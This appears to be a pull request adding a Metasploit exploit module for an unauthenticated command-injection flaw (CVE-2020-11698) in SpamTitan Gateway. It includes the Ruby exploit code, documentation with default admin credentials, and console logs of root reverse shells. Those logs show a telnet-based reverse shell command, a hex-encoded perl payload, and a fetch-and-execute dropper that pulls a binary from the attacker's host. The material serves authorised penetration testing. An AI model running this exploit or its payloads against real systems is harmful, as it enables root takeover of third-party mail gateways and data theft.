### PR TITLE
SpamTitan Gateway Remote Code Execution

### DIFF
--- a/documentation/modules/exploit/freebsd/webapp/spamtitan_unauth_rce.md
+++ b/documentation/modules/exploit/freebsd/webapp/spamtitan_unauth_rce.md
@@ -1,0 +1,338 @@
+TitanHQ SpamTitan Gateway is an anti-spam appliance that protects against
+unwanted emails and malwares. This module exploits an improper input
+sanitization in versions 7.01, 7.02, 7.03 and 7.07 to inject command directives
+into the SNMP configuration file and get remote code execution as root. Note
+that only version 7.03 needs authentication, whereas no authentication is
+required for versions 7.01, 7.02 and 7.07.
+
+First, it sends an HTTP POST request to the `snmp-x.php` page with an `SNMPD`
+command directives (`extend` + command) passed to the `community` parameter.
+This payload is then added to `snmpd.conf` by the application. Finally, the
+module triggers the execution of this command by querying the SNMP server for
+the correct OID.
+
+This exploit module has been successfully tested against versions 7.01, 7.02,
+7.03, and 7.07.
+
+## Vulnerable Application
+
+A demo version of the vulnerable application can be downloaded
+[here](https://www.titanhq.com/signup/?product_type=spamtitangateway). Since
+the latest version of SpamTitan Gateway has this vulnerability fixed and no
+demo of the vulnerable versions are available for download, the previous major
+release demo has to be used and updates have to be installed manually.
+
+Installation steps:
+1. Download SpamTitan Gateway version 6 demo `.ova` image:
+   https://stdownload.titanhq.com/vmware/SpamTitan-6-amd64.ova
+2. Import it to your favorite virtualization software and start it
+3. Access the SpamTitan web user interface from the appliance IP. This IP is
+   usually displayed on the welcome page once the virtual machine has boot up.
+4. Login with the default credentials:
+    - username: `admin`
+    - password: `hiadmin`
+5. Go to `System Setup` > `System Updates` and click `Start` in the `Check for
+  Updates Now` section. It will download all available update patches.
+6. From the `Available Updates` section, choose the version you want to test
+   and click the `install` button in front of it.
+
+## Verification Steps
+
+1. Install the application (see Vulnerable Application)
+2. Start msfconsole
+3. Do: `use exploit/freebsd/webapp/spamtitan_unauth_rce`
+4. Do: `set RHOSTS <ip>`
+5. Do: `set LHOST <ip>`
+6. Do: `run`
+7. You should get a shell.
+
+## Options
+
+### TARGETURI
+The base path to SpamTitan. Default value is `/`.
+
+### USERNAME
+The username to authenticate, if required (depending on SpamTitan Gateway
+version). Default value is `admin`.
+
+### PASSWORD The password to authenticate, if required (depending on SpamTitan
+Gateway version). Default value is `hiadmin`.
+
+### COMMUNITY
+The SNMP Community String to use (random string by default)
+
+### ALLOWEDIP
+The IP address that will be allowed to query the injected `extend` command.
+This IP will be added to the SNMP configuration file on the target. This is
+tipically this host IP address, but can be different if your are in a NAT'ed
+network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it
+will default to `127.0.0.1`.
+
+## Scenarios
+Specific demo of using the module that might be useful in a real world scenario.
+
+### SpamTitan Gateway v7.01 - target 0 (in-memory command)
+
+```
+msf6 > use exploit/freebsd/webapp/spamtitan_unauth_rce
+[*] Using configured payload cmd/unix/reverse
+msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > set LHOST 172.16.60.1
+LHOST => 172.16.60.1
+msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > set RHOSTS 172.16.60.101
+RHOSTS => 172.16.60.101
+msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > set verbose true
+verbose => true
+msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > show options
+
+Module options (exploit/freebsd/webapp/spamtitan_unauth_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   ALLOWEDIP                   no        The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is tipically this host IP address, but can be different if your are in a NAT'ed network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`.
+   COMMUNITY  BTMlXXtt         no        The SNMP Community String to use (random string by default)
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RETRIES    1                yes       SNMP Retries
+   RHOSTS     172.16.60.101    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80               yes       The target port (UDP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to SpamTitan
+   TIMEOUT    1                yes       SNMP Timeout
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VERSION    1                yes       SNMP Version <1/2c>
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.16.60.1      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix In-Memory
+
+
+msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > check
+
+[*] Check if /snmp-x.php exists
+[*] 172.16.60.101:80 - The target appears to be vulnerable.
+msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > run
+
+[+] sh -c '(sleep 4511|telnet 172.16.60.1 4444|while : ; do sh && break; done 2>&1|telnet 172.16.60.1 4444 >/dev/null 2>&1 &)'
+[*] Started reverse TCP double handler on 172.16.60.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[*] Check if /snmp-x.php exists
+[+] The target appears to be vulnerable.
+[*] Send a request to /snmp-x.php and inject the payload: /bin/tcsh -c 'perl -e system -e pack -e qq,H244,,qq,7368202d63202728736c65657020333735347c74656c6e6574203137322e31362e36302e3120343434347c7768696c65203a203b20646f20736820262620627265616b3b20646f6e6520323e26317c74656c6e6574203137322e31362e36302e312034343434203e2f6465762f6e756c6c20323e263120262927,'#
+[*] Send an SNMP Get-Request to trigger the payload
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo ldqlDor8slARqZ0Q;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket A
+[*] A: "Connected: not found\r\nEscape: not found\r\n"
+[*] Matching...
+[*] B is input...
+[*] Command shell session 1 opened (172.16.60.1:4444 -> 172.16.60.101:38973) at 2020-10-28 15:56:55 +0100
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
+uname -a
+FreeBSD spamtitan.example.com 10.1-RELEASE-p8 FreeBSD 10.1-RELEASE-p8 #1: Wed May  6 10:36:09 IST 2015     root@stbuild-10-amd64.spamtitan.com:/usr/obj/usr/src/sys/SPAMTITAN  amd64
+ifconfig
+em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
+	options=9b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM>
+	ether 00:0c:29:cb:1d:73
+	inet 172.16.60.101 netmask 0xffffff00 broadcast 172.16.60.255
+	nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
+	media: Ethernet autoselect (1000baseT <full-duplex>)
+	status: active
+lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> metric 0 mtu 16384
+	options=600003<RXCSUM,TXCSUM,RXCSUM_IPV6,TXCSUM_IPV6>
+	inet6 ::1 prefixlen 128
+	inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2
+	inet 127.0.0.1 netmask 0xff000000
+	inet 127.0.0.2 netmask 0xffffffff
+	inet 127.0.0.3 netmask 0xffffffff
+	nd6 options=21<PERFORMNUD,AUTO_LINKLOCAL>
+^C
+Abort session 1? [y/N]  y
+
+[*] 172.16.60.101 - Command shell session 1 closed.  Reason: User exit
+```
+
+### SpamTitan Gateway v7.01 - target 1 (FreeBSD Dropper - x64)
+
+```
+msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > set target 1
+target => 1
+msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > show options
+
+Module options (exploit/freebsd/webapp/spamtitan_unauth_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   ALLOWEDIP                   no        The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is tipically this host IP address, but can be different if your are in a NAT'ed network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`.
+   COMMUNITY  BTMlXXtt         no        The SNMP Community String to use (random string by default)
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RETRIES    1                yes       SNMP Retries
+   RHOSTS     172.16.60.101    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80               yes       The target port (UDP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to SpamTitan
+   TIMEOUT    1                yes       SNMP Timeout
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VERSION    1                yes       SNMP Version <1/2c>
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (bsd/x64/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   CMD    /bin/sh          yes       The command string to execute
+   LHOST  172.16.60.1      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   FreeBSD Dropper (x64)
+
+
+msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > run
+
+[*] Started reverse TCP handler on 172.16.60.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[*] Check if /snmp-x.php exists
+[+] The target appears to be vulnerable.
+[*] Using URL: http://0.0.0.0:8080/AW6l3kjAO2B
+[*] Local IP: http://192.168.1.75:8080/AW6l3kjAO2B
+[*] Generated command stager: ["fetch -qo /tmp/BrnPtJiQ http://172.16.60.1:8080/AW6l3kjAO2B", "chmod +x /tmp/BrnPtJiQ", "/tmp/BrnPtJiQ", "rm -f /tmp/BrnPtJiQ"]
+[*] Send a request to /snmp-x.php and inject the payload: /bin/tcsh -c 'fetch\ -qo\ /tmp/BrnPtJiQ\ http://172.16.60.1:8080/AW6l3kjAO2B&'#
+[*] Send an SNMP Get-Request to trigger the payload
+[*] Client 172.16.60.101 (fetch libfetch/2.0) requested /AW6l3kjAO2B
+[*] Sending payload to 172.16.60.101 (fetch libfetch/2.0)
+[+] SNMP Get-Request response (status=noError): [1] 16531
+[*] Command Stager progress -  52.21% done (59/113 bytes)
+[*] Send a request to /snmp-x.php and inject the payload: /bin/tcsh -c 'chmod\ \+x\ /tmp/BrnPtJiQ&'#
+[*] Send an SNMP Get-Request to trigger the payload
+[+] SNMP Get-Request response (status=noError): [1] 16561
+[*] Command Stager progress -  71.68% done (81/113 bytes)
+[*] Send a request to /snmp-x.php and inject the payload: /bin/tcsh -c '/tmp/BrnPtJiQ&'#
+[*] Send an SNMP Get-Request to trigger the payload
+[+] SNMP Get-Request response (status=noError): [1] 16590
+[*] Command shell session 2 opened (172.16.60.1:4444 -> 172.16.60.101:16026) at 2020-10-28 15:57:34 +0100
+[*] Command Stager progress -  83.19% done (94/113 bytes)
+[*] Send a request to /snmp-x.php and inject the payload: /bin/tcsh -c 'rm\ -f\ /tmp/BrnPtJiQ&'#
+[*] Send an SNMP Get-Request to trigger the payload
+[+] SNMP Get-Request response (status=noError): [1] 16619
+[*] Command Stager progress - 100.00% done (113/113 bytes)
+[*] Server stopped.
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
+uname -a
+FreeBSD spamtitan.example.com 10.1-RELEASE-p8 FreeBSD 10.1-RELEASE-p8 #1: Wed May  6 10:36:09 IST 2015     root@stbuild-10-amd64.spamtitan.com:/usr/obj/usr/src/sys/SPAMTITAN  amd64
+^C
+Abort session 2? [y/N]  y
+
+[*] 172.16.60.101 - Command shell session 2 closed.  Reason: User exit
+```
+
+### SpamTitan Gateway v7.01 - target 1 (FreeBSD Dropper - x64)
+
+```
+msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > set target 2
+target => 2
+msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > show options
+
+Module options (exploit/freebsd/webapp/spamtitan_unauth_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   ALLOWEDIP                   no        The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is tipically this host IP address, but can be different if your are in a NAT'ed network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`.
+   COMMUNITY  BTMlXXtt         no        The SNMP Community String to use (random string by default)
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RETRIES    1                yes       SNMP Retries
+   RHOSTS     172.16.60.101    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80               yes       The target port (UDP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to SpamTitan
+   TIMEOUT    1                yes       SNMP Timeout
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VERSION    1                yes       SNMP Version <1/2c>
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (bsd/x86/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.16.60.1      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   FreeBSD Dropper (x86)
+
+msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > run
+
+[*] Started reverse TCP handler on 172.16.60.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[*] Check if /snmp-x.php exists
+[+] The target appears to be vulnerable.
+[*] Using URL: http://0.0.0.0:8080/EtQflZ
+[*] Local IP: http://192.168.1.75:8080/EtQflZ
+[*] Generated command stager: ["fetch -qo /tmp/uTJGnSFj http://172.16.60.1:8080/EtQflZ", "chmod +x /tmp/uTJGnSFj", "/tmp/uTJGnSFj", "rm -f /tmp/uTJGnSFj"]
+[*] Send a request to /snmp-x.php and inject the payload: /bin/tcsh -c 'fetch\ -qo\ /tmp/uTJGnSFj\ http://172.16.60.1:8080/EtQflZ&'#
+[*] Send an SNMP Get-Request to trigger the payload
+[*] Client 172.16.60.101 (fetch libfetch/2.0) requested /EtQflZ
+[*] Sending payload to 172.16.60.101 (fetch libfetch/2.0)
+[+] SNMP Get-Request response (status=noError): [1] 16656
+[*] Command Stager progress -  50.00% done (54/108 bytes)
+[*] Send a request to /snmp-x.php and inject the payload: /bin/tcsh -c 'chmod\ \+x\ /tmp/uTJGnSFj&'#
+[*] Send an SNMP Get-Request to trigger the payload
+[+] SNMP Get-Request response (status=noError): [1] 16685
+[*] Command Stager progress -  70.37% done (76/108 bytes)
+[*] Send a request to /snmp-x.php and inject the payload: /bin/tcsh -c '/tmp/uTJGnSFj&'#
+[*] Send an SNMP Get-Request to trigger the payload
+[+] SNMP Get-Request response (status=noError): [1] 16714
+[*] Command shell session 3 opened (172.16.60.1:4444 -> 172.16.60.101:45568) at 2020-10-28 15:58:09 +0100
+[*] Command Stager progress -  82.41% done (89/108 bytes)
+[*] Send a request to /snmp-x.php and inject the payload: /bin/tcsh -c 'rm\ -f\ /tmp/uTJGnSFj&'#
+[*] Send an SNMP Get-Request to trigger the payload
+[+] SNMP Get-Request response (status=noError): [1] 16743
+[*] Command Stager progress - 100.00% done (108/108 bytes)
+[*] Server stopped.
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
+uname -a
+FreeBSD spamtitan.example.com 10.1-RELEASE-p8 FreeBSD 10.1-RELEASE-p8 #1: Wed May  6 10:36:09 IST 2015     root@stbuild-10-amd64.spamtitan.com:/usr/obj/usr/src/sys/SPAMTITAN  amd64
+^C
+Abort session 3? [y/N]  y
+
+[*] 172.16.60.101 - Command shell session 3 closed.  Reason: User exit
+```

--- a/documentation/modules/exploit/freebsd/webapp/spamtitan_unauth_rce.md
+++ b/documentation/modules/exploit/freebsd/webapp/spamtitan_unauth_rce.md
@@ -1,9 +1,11 @@
+## Vulnerable Application
+
 TitanHQ SpamTitan Gateway is an anti-spam appliance that protects against
 unwanted emails and malwares. This module exploits an improper input
 sanitization in versions 7.01, 7.02, 7.03 and 7.07 to inject command directives
 into the SNMP configuration file and get remote code execution as root. Note
-that only version 7.03 needs authentication, whereas no authentication is
-required for versions 7.01, 7.02 and 7.07.
+that only version 7.03 needs authentication and no authentication is required
+for versions 7.01, 7.02 and 7.07.
 
 First, it sends an HTTP POST request to the `snmp-x.php` page with an `SNMPD`
 command directives (`extend` + command) passed to the `community` parameter.
@@ -14,7 +16,7 @@ the correct OID.
 This exploit module has been successfully tested against versions 7.01, 7.02,
 7.03, and 7.07.
 
-## Vulnerable Application
+## Installation
 
 A demo version of the vulnerable application can be downloaded
 [here](https://www.titanhq.com/signup/?product_type=spamtitangateway). Since
@@ -38,7 +40,7 @@ Installation steps:
 
 ## Verification Steps
 
-1. Install the application (see Vulnerable Application)
+1. Install the application (see Installation)
 2. Start msfconsole
 3. Do: `use exploit/freebsd/webapp/spamtitan_unauth_rce`
 4. Do: `set RHOSTS <ip>`
@@ -55,8 +57,9 @@ The base path to SpamTitan. Default value is `/`.
 The username to authenticate, if required (depending on SpamTitan Gateway
 version). Default value is `admin`.
 
-### PASSWORD The password to authenticate, if required (depending on SpamTitan
-Gateway version). Default value is `hiadmin`.
+### PASSWORD
+The password to authenticate, if required (depending on SpamTitan Gateway
+version). Default value is `hiadmin`.
 
 ### COMMUNITY
 The SNMP Community String to use (random string by default)
@@ -69,7 +72,6 @@ network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it
 will default to `127.0.0.1`.
 
 ## Scenarios
-Specific demo of using the module that might be useful in a real world scenario.
 
 ### SpamTitan Gateway v7.01 - target 0 (in-memory command)
 
@@ -255,7 +257,7 @@ Abort session 2? [y/N]  y
 [*] 172.16.60.101 - Command shell session 2 closed.  Reason: User exit
 ```
 
-### SpamTitan Gateway v7.01 - target 1 (FreeBSD Dropper - x64)
+### SpamTitan Gateway v7.01 - target 2 (FreeBSD Dropper - x86)
 
 ```
 msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > set target 2

--- a/documentation/modules/exploit/freebsd/webapp/spamtitan_unauth_rce.md
+++ b/documentation/modules/exploit/freebsd/webapp/spamtitan_unauth_rce.md
@@ -62,7 +62,7 @@ The password to authenticate, if required (depending on SpamTitan Gateway
 version). Default value is `hiadmin`.
 
 ### COMMUNITY
-The SNMP Community String to use (random string by default)
+The SNMP Community String to use (random string by default).
 
 ### ALLOWEDIP
 The IP address that will be allowed to query the injected `extend` command.
@@ -70,6 +70,9 @@ This IP will be added to the SNMP configuration file on the target. This is
 tipically this host IP address, but can be different if your are in a NAT'ed
 network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it
 will default to `127.0.0.1`.
+
+### SNMPPORT
+The target SNMP port (UDP). Default port is `161`.
 
 ## Scenarios
 

--- a/lib/msf/core/exploit/remote/snmp_client.rb
+++ b/lib/msf/core/exploit/remote/snmp_client.rb
@@ -43,8 +43,8 @@ module Exploit::Remote::SNMPClient
     version = :SNMPv2c if datastore['VERSION'] == '2c'
 
     snmp = ::SNMP::Manager.new(
-      :Host => opts['PeerHost'] || rhost,
-      :Port => opts['PeerPort'] || rport,
+      :Host => opts['RHOST'] || rhost,
+      :Port => opts['RPORT'] || rport,
       :Community => datastore['COMMUNITY'],
       :Version => version,
       :Timeout => datastore['TIMEOUT'],

--- a/modules/exploits/freebsd/webapp/spamtitan_unauth_rce.rb
+++ b/modules/exploits/freebsd/webapp/spamtitan_unauth_rce.rb
@@ -1,0 +1,175 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::SNMPClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'SpamTitan Unauthenticated RCE',
+        # TODO: Description is straight from the POC, update it
+        'Description'    => %q(
+        TitanHQ
+        SpamTitan Gateway is a powerful Anti-Spam appliance that equips network
+        administrators with extensive tools to control mail flow and protect
+        against unwanted email and malware. Improper input sanitization of the
+        parameter "community" on the page snmp-x.php would allow a remote
+        attacker to inject command directives into the file snmpd.conf. This
+        would allow executing commands on the target server by by injecting an
+        "extend" or "exec" SNMPD directive and querying the snmp daemon of the
+        server for the correct OID.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'Christophe De La Fuente', # msf module
+            'Felipe Molina' # original PoC
+          ],
+        'References'     =>
+          [
+            [ 'EDB', '48856' ],
+            [ 'URL', 'https://www.titanhq.com/spamtitan/spamtitangateway/'],
+            [ 'CVE', '2020-11698']
+          ],
+        'Platform'       => %w[php freebsd],
+        'Arch'           => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
+        'CmdStagerFlavor' => :wget,
+        'Payload' => {
+          'DisableNops'    => true,
+        },
+        'Targets'        =>
+          [
+            ['Unix In-Memory',
+              'Platform'       => 'unix',
+              'Arch'           => ARCH_CMD,
+              'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
+              'Payload' => {
+                'BadChars'       => "\\'#",
+                'Encoder'        => 'cmd/perl',
+                'PrependEncoder' => '/bin/sh -c \'',
+                'AppendEncoder'  => '\'#',
+                'Space'          => 470
+              },
+              'Type'           => :unix_memory
+            ],
+            ['FreeBSD Dropper (x64)',
+              'Platform'       => 'bsd',
+              'Arch'           => [ARCH_X64],
+              'DefaultOptions' => {'PAYLOAD' => 'bsd/x64/shell_reverse_tcp'},
+              'Payload' => {
+                'BadChars'       => "'#",
+                'Space'          => 450
+              },
+              'Type'           => :bsd_dropper
+            ],
+            ['FreeBSD Dropper (x86)',
+              'Platform'       => 'bsd',
+              'Arch'           => [ARCH_X86],
+              'DefaultOptions' => {'PAYLOAD' => 'bsd/x86/shell_reverse_tcp'},
+              'Type'           => :bsd_dropper
+            ]
+          ],
+        'DisclosureDate' => '2020-04-17',
+        'DefaultTarget'  => 0,
+        'Notes'          => {
+          'Stability'   => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The base path to SpamTitan', '/' ]),
+        OptString.new('COMMUNITY', [ false, 'SNMP Community String. If not set, a random string will be used by default' ]),
+        OptString.new('IP', [ false, 'This host source IP. This IP will be allowed to query the injected random community. If not set, and LHOST has been set, it will be used by default. Otherwise ...' ]),
+      ], self.class
+    )
+  end
+
+  def check
+    begin
+      snmp_x_uri = normalize_uri(target_uri.path, 'snmp-x.php')
+      vprint_status("Check if #{snmp_x_uri} exists")
+      res = send_request_cgi(
+        'uri'       => snmp_x_uri,
+        'method'    => 'GET'
+      )
+
+      if res.nil?
+        fail_with(Failure::Unreachable,
+          "#{peer} - Could not connect to SpamTitan vulnerable page "\
+          "(#{snmp_x_uri}) - no response"
+        )
+      end
+      unless res.code == 200
+        fail_with(Failure::UnexpectedReply,
+          "#{peer} - Could not connect to SpamTitan vulnerable page "\
+          "(#{snmp_x_uri}) - unexpected HTTP response code: #{res.code}"
+        )
+      end
+    rescue ::Rex::ConnectionError => e
+      print_error("Connection error: #{e}")
+      fail_with(Failure::Unreachable,
+        "#{peer} - Could not connect to SpamTitan "\
+        "vulnerable page (#{snmp_x_uri})"
+      )
+    end
+
+    # TODO: add more check to make sure it is vulnerable
+
+    Exploit::CheckCode::Appears
+  end
+
+  def exploit
+    if target['Type'] == :unix_memory
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(linemax: payload_info['Space'].to_i, noconcat: true)
+    end
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+  end
+
+  def execute_command(cmd, opts = {})
+    if target['Type'] == :bsd_dropper
+      cmd = "/bin/sh -c '#{[cmd.gsub('\'', '\\\\\'').gsub('\\', '\\\\\\')].shelljoin}'#"
+    end
+    snmp_x_uri = normalize_uri(target_uri.path, 'snmp-x.php')
+    datastore['COMMUNITY'] ||= Rex::Text.rand_text_alpha(8)
+    ip = datastore['IP'] || datastore['LHOST'] || '127.0.0.1'
+    name = Rex::Text.rand_text_alpha(8)
+    res = send_request_cgi(
+      'uri'           => snmp_x_uri,
+      'method'        => 'POST',
+      'vars_post'     => {
+        'jaction'   => 'saveAll',
+        'contact'   => 'CONTACT',
+        'name'      => 'SpamTitan',
+        'location'  => 'LOCATION',
+        # Add our IP as allowed to query the injected 'dummy' community
+        # Also add the payload in a new line (%0a) of the snmpd.conf file
+        'community' => "#{datastore['COMMUNITY']}\" #{ip}\nextend #{name} #{cmd}"
+      }
+    )
+    # Send an SNMP Get-Request to trigger the payload
+    # RPORT needs to be set since the default value is set to the web service port
+    connect_snmp(true, 'RPORT' => 161)
+    begin
+      snmp.get("1.3.6.1.4.1.8072.1.3.2.3.1.1.8.#{name.bytes.join('.')}")
+    rescue SNMP::RequestTimeout, IOError
+      # not expecting response here, so timeout is likely to happen
+    end
+  end
+
+end

--- a/modules/exploits/freebsd/webapp/spamtitan_unauth_rce.rb
+++ b/modules/exploits/freebsd/webapp/spamtitan_unauth_rce.rb
@@ -7,8 +7,8 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
   prepend Msf::Exploit::Remote::AutoCheck
-  include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::SNMPClient
+  include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
 
   def initialize(info = {})
@@ -105,7 +105,8 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_options(
       [
-        Opt::RPORT(80),
+        Opt::RPORT(80, true, 'The target HTTP port'),
+        OptPort.new('SNMPPORT', [ true, 'The target SNMP port (UDP)', 161 ]),
         OptString.new('TARGETURI', [ true, 'The base path to SpamTitan', '/' ]),
         OptString.new(
           'USERNAME',
@@ -289,7 +290,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # RPORT needs to be specified since the default value is set to the web
     # service port.
-    connect_snmp(true, 'RPORT' => 161)
+    connect_snmp(true, 'RPORT' => datastore['SNMPPORT'])
     begin
       res = snmp.get("1.3.6.1.4.1.8072.1.3.2.3.1.1.8.#{name.bytes.join('.')}")
       msg = "SNMP Get-Request response (status=#{res.error_status}): "\

--- a/modules/exploits/freebsd/webapp/spamtitan_unauth_rce.rb
+++ b/modules/exploits/freebsd/webapp/spamtitan_unauth_rce.rb
@@ -4,7 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = ExcellentRanking
+  Rank = NormalRanking
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
@@ -16,22 +16,27 @@ class MetasploitModule < Msf::Exploit::Remote
       update_info(
         info,
         'Name' => 'SpamTitan Unauthenticated RCE',
-        # TODO: Description is straight from the POC, update it
         'Description' => %q{
-          TitanHQ
-          SpamTitan Gateway is a powerful Anti-Spam appliance that equips network
-          administrators with extensive tools to control mail flow and protect
-          against unwanted email and malware. Improper input sanitization of the
-          parameter "community" on the page snmp-x.php would allow a remote
-          attacker to inject command directives into the file snmpd.conf. This
-          would allow executing commands on the target server by by injecting an
-          "extend" or "exec" SNMPD directive and querying the snmp daemon of the
-          server for the correct OID.
+          TitanHQ SpamTitan Gateway is an anti-spam appliance that protects against
+          unwanted emails and malwares. This module exploits an improper input
+          sanitization in versions 7.01, 7.02, 7.03 and 7.07 to inject command directives
+          into the SNMP configuration file and get remote code execution as root. Note
+          that only version 7.03 needs authentication, whereas no authentication is
+          required for versions 7.01, 7.02 and 7.07.
+
+          First, it sends an HTTP POST request to the `snmp-x.php` page with an `SNMPD`
+          command directives (`extend` + command) passed to the `community` parameter.
+          This payload is then added to `snmpd.conf` by the application. Finally, the
+          module triggers the execution of this command by querying the SNMP server for
+          the correct OID.
+
+          This exploit module has been successfully tested against versions 7.01, 7.02,
+          7.03, and 7.07.
         },
         'License' => MSF_LICENSE,
         'Author' =>
           [
-            'Christophe De La Fuente', # msf module
+            'Christophe De La Fuente', # MSF module
             'Felipe Molina' # original PoC
           ],
         'References' =>
@@ -40,9 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
             [ 'URL', 'https://www.titanhq.com/spamtitan/spamtitangateway/'],
             [ 'CVE', '2020-11698']
           ],
-        'Platform' => %w[php freebsd],
-        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
-        'CmdStagerFlavor' => :wget,
+        'CmdStagerFlavor' => [:fetch, :wget, :curl],
         'Payload' => {
           'DisableNops' => true
         },
@@ -56,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Payload' => {
                 'BadChars' => "\\'#",
                 'Encoder' => 'cmd/perl',
-                'PrependEncoder' => '/bin/sh -c \'',
+                'PrependEncoder' => '/bin/tcsh -c \'',
                 'AppendEncoder' => '\'#',
                 'Space' => 470
               },
@@ -78,6 +81,10 @@ class MetasploitModule < Msf::Exploit::Remote
